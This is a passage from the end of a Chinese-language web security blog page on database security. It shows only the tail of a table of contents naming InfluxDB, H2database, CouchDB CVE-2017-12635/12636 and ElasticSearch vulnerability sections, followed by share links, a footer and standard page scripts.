class="toc-text">InfluxDB</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#H2database-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="toc-number">6.</span> <span class="toc-text">H2database 未授权访问</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CouchDB"><span class="toc-number">7.</span> <span class="toc-text">CouchDB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Couchdb-%E5%9E%82%E7%9B%B4%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2017-12635%EF%BC%89"><span class="toc-number">7.1.</span> <span class="toc-text">Couchdb 垂直权限绕过漏洞（CVE-2017-12635）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Couchdb-%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-CVE-2017-12636"><span class="toc-number">7.2.</span> <span class="toc-text">Couchdb 任意命令执行 CVE-2017-12636</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BF%AE%E6%94%B9-query-servers-%E9%85%8D%E7%BD%AE"><span class="toc-number">7.2.1.</span> <span class="toc-text">1. 修改 query_servers 配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E8%A7%A6%E5%8F%91%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">7.2.2.</span> <span class="toc-text">2. 触发命令执行</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CouchDB-1-x-%E5%92%8C-2-x-%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">7.2.3.</span> <span class="toc-text">CouchDB 1.x 和 2.x 的区别</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ElasticSearch-%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5-RCE-%E6%BC%8F%E6%B4%9E"><span class="toc-number">8.</span> <span class="toc-text">ElasticSearch-文件写入&amp;RCE-漏洞</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&text=【Web安全】数据库安全笔记"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&is_video=false&description=【Web安全】数据库安全笔记"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】数据库安全笔记&body=Check out this article: https://g0dam.github.io/2024/09/30/WebSecurity/database-security/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&title=【Web安全】数据库安全笔记"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&name=【Web安全】数据库安全笔记&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://g0dam.github.io/2024/09/30/WebSecurity/database-security/&t=【Web安全】数据库安全笔记"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    g0dam
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'owner/githubrepo';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
